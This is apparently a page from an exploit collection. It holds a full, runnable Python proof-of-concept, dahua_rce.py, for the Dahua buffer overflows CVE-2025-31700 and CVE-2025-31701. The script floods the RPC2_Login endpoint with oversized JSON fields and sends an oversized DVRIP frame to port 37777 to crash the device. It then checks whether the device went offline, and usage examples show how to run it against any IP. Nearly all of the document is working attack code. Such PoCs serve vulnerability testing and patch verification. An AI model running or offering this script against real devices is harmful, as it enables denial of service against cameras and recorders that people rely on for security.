5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / dahua_rce.py PY
#!/usr/bin/env python3
"""
dahua_rce.py  CVE-2025-31700 / CVE-2025-31701 Buffer Overflow PoC
====================================================================

CVE-2025-31700
  CVSS  : 8.1 HIGH
  CWE   : CWE-120 (Buffer Copy Without Checking Size of Input)
  Source: https://nvd.nist.gov/vuln/detail/CVE-2025-31700
  Vendor: https://dahuasecurity.com/aboutUs/trustedCenter/details/775

CVE-2025-31701
  CVSS  : 8.1 HIGH
  CWE   : CWE-120
  Source: https://nvd.nist.gov/vuln/detail/CVE-2025-31701
  Vendor: same advisory as CVE-2025-31700

Technical details
-----------------
Both CVEs are stack/heap buffer overflows triggered by specially crafted
inbound packets. On devices without ASLR/stack canaries, a crash or
controlled RCE is possible. With ASLR the most likely outcome is a DoS
(device restart or reboot).

This script:
  1. Probes the HTTP RPC2 endpoint with an oversized JSON body.
  2. Probes the Dahua binary protocol on TCP/37777 with an oversized frame.
  3. Monitors for a crash (connection reset, timeout, 5xx) which confirms
     the device is vulnerable.

WARNING - This test intentionally sends malformed data and *may crash the
target device*. Only run against devices you own or have written permission
to test.
"""

import argparse
import socket
import struct
import sys
import time

import requests

requests.packages.urllib3.disable_warnings()


# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------

TCP_PROTOCOL_PORT = 37777    # Dahua binary/DVRIP protocol
HTTP_OVERFLOW_SZ  = 8192     # bytes  far exceeds any legitimate field length
TCP_OVERFLOW_SZ   = 65535    # bytes for raw binary frame body


# ---------------------------------------------------------------------------
# HTTP / RPC2 overflow probe  (CVE-2025-31700)
# ---------------------------------------------------------------------------

def http_overflow_probe(target, port=80, timeout=8):
    """
    Send an over-length RPC2 JSON body to trigger the HTTP-layer buffer
    overflow described in CVE-2025-31700.

    Returns a result dict:
      { "status": <int|str>, "bytes": <int>, "crashed": <bool> }
    """
    garbage = "A" * HTTP_OVERFLOW_SZ

    payload = {
        "method": "global.login",
        "params": {
            "userName": garbage,
            "password": garbage,
            "clientType": garbage,
            "authorityType": "Default",
            "passwordType": "Default"
        },
        "id": 1
    }

    try:
        r = requests.post(
            f"http://{target}:{port}/RPC2_Login",
            json=payload,
            timeout=timeout,
            verify=False
        )
        crashed = r.status_code >= 500
        return {"status": r.status_code, "bytes": len(r.content), "crashed": crashed}

    except requests.exceptions.ConnectionError as e:
        if "reset" in str(e).lower() or "refused" in str(e).lower():
            return {"status": "CONNECTION_RESET", "bytes": 0, "crashed": True}
        return {"status": f"CONN_ERROR: {e}", "bytes": 0, "crashed": False}

    except requests.exceptions.Timeout:
        return {"status": "TIMEOUT", "bytes": 0, "crashed": True}

    except Exception as e:
        return {"status": str(e), "bytes": 0, "crashed": False}


# ---------------------------------------------------------------------------
# TCP binary protocol overflow probe  (CVE-2025-31701)
# ---------------------------------------------------------------------------

def build_dvrip_frame(body):
    """
    Minimal DVRIP / Dahua binary protocol frame.

    Frame layout (big-endian):
      0xFFD1     version magic
      0x0000     session (0 = unauthenticated)
      0x0000     sequence
      0x0000     channel
      <uint32>   body length
      <body>
    """
    magic   = struct.pack(">H", 0xFFD1)
    session = struct.pack(">H", 0x0000)
    seq     = struct.pack(">H", 0x0000)
    channel = struct.pack(">H", 0x0000)
    length  = struct.pack(">I", len(body))
    return magic + session + seq + channel + length + body


def tcp_overflow_probe(target, tcp_port=TCP_PROTOCOL_PORT, timeout=8):
    """
    Send an oversized DVRIP frame to TCP/37777 to trigger the binary-protocol
    layer overflow described in CVE-2025-31701.

    Returns { "status": <str>, "bytes": <int>, "crashed": <bool> }
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((target, tcp_port))
    except ConnectionRefusedError:
        return {"status": "PORT_CLOSED", "bytes": 0, "crashed": False}
    except socket.timeout:
        return {"status": "CONNECT_TIMEOUT", "bytes": 0, "crashed": False}
    except Exception as e:
        return {"status": str(e), "bytes": 0, "crashed": False}

    body  = b"B" * TCP_OVERFLOW_SZ
    frame = build_dvrip_frame(body)

    try:
        s.sendall(frame)

        try:
            resp = s.recv(1024)
            s.close()
            return {"status": "RESPONDED", "bytes": len(resp), "crashed": False}

        except socket.timeout:
            s.close()
            return {"status": "TIMEOUT_AFTER_SEND", "bytes": 0, "crashed": True}

    except BrokenPipeError:
        return {"status": "BROKEN_PIPE (reset by peer)", "bytes": 0, "crashed": True}
    except Exception as e:
        return {"status": str(e), "bytes": 0, "crashed": True}
    finally:
        try:
            s.close()
        except Exception:
            pass


# ---------------------------------------------------------------------------
# Reachability check
# ---------------------------------------------------------------------------

def check_alive(target, port=80, timeout=5):
    """Return True if the device responds to a basic HTTP request."""
    try:
        requests.get(f"http://{target}:{port}/", timeout=timeout, verify=False)
        return True
    except Exception:
        return False


# ---------------------------------------------------------------------------
# Main exploit flow
# ---------------------------------------------------------------------------

def run(target, port=80, tcp_port=TCP_PROTOCOL_PORT, timeout=8, cve="both"):

    print(f"""
=================================================
  Dahua Buffer Overflow  CVE-2025-31700/31701
  WARNING: may crash the target device (DoS)
=================================================
Target   : {target}
HTTP     : :{port}
TCP/DVRIP: :{tcp_port}
Mode     : {cve}
""")

    alive_before = check_alive(target, port, timeout)
    print(f"[*] Device reachable before probe: {'YES' if alive_before else 'NO'}")
    if not alive_before:
        print("[-] Device not responding  aborting")
        sys.exit(1)

    http_result = {"status": "SKIPPED", "bytes": 0, "crashed": False}
    tcp_result  = {"status": "SKIPPED", "bytes": 0, "crashed": False}

    if cve in ("http", "both", "2025-31700"):
        print("\n[*] Sending HTTP RPC2 overflow (CVE-2025-31700) ...")
        http_result = http_overflow_probe(target, port, timeout)
        print(f"    status  : {http_result['status']}")
        print(f"    bytes   : {http_result['bytes']}")
        print(f"    crashed : {http_result['crashed']}")

    if cve in ("tcp", "both", "2025-31701"):
        print("\n[*] Sending TCP/DVRIP overflow (CVE-2025-31701) ...")
        tcp_result = tcp_overflow_probe(target, tcp_port, timeout)
        print(f"    status  : {tcp_result['status']}")
        print(f"    bytes   : {tcp_result['bytes']}")
        print(f"    crashed : {tcp_result['crashed']}")

    time.sleep(3)
    alive_after = check_alive(target, port, timeout)
    print(f"\n[*] Device reachable after probe : {'YES' if alive_after else 'NO'}")

    print("\n" + "=" * 51)
    print("RESULT")
    print("=" * 51)

    crashed = http_result["crashed"] or tcp_result["crashed"]

    if not alive_after:
        print("  [!!!] Device OFFLINE after payload  DoS confirmed")
        print("  Likely VULNERABLE to CVE-2025-31700 / CVE-2025-31701")
    elif crashed:
        print("  [!!!] Crash indicators observed during probe")
        print("  Likely VULNERABLE (verify by checking device logs/reboot)")
    else:
        print("  [-] No crash observed  possibly patched or different firmware")
        print("  Note: absence of crash does not guarantee patch; test on all ports")

    if alive_after and crashed:
        print("\n  [+] Device recovered  ASLR or watchdog may have restarted the service")
        print("  [+] Consistent with a real overflow contained by ASLR")


def main():
    parser = argparse.ArgumentParser(
        description="Dahua CVE-2025-31700/01 Buffer Overflow DoS PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python dahua_rce.py 192.168.1.100
  python dahua_rce.py 192.168.1.100 -p 8080 --tcp-port 37777
  python dahua_rce.py 192.168.1.100 --cve http
  python dahua_rce.py 192.168.1.100 --cve tcp
        """
    )
    parser.add_argument("target", help="Camera IP or hostname")
    parser.add_argument("-p", "--port",    type=int, default=80,
                        help="HTTP port (default: 80)")
    parser.add_argument("--tcp-port",      type=int, default=TCP_PROTOCOL_PORT,
                        help=f"Dahua binary protocol port (default: {TCP_PROTOCOL_PORT})")
    parser.add_argument("--cve",
                        choices=["both", "http", "tcp", "2025-31700", "2025-31701"],
                        default="both",
                        help="Which overflow to test (default: both)")
    parser.add_argument("--timeout", type=int, default=8)

    args = parser.parse_args()
    run(args.target, args.port, args.tcp_port, args.timeout, args.cve)


if __name__ == "__main__":
    main()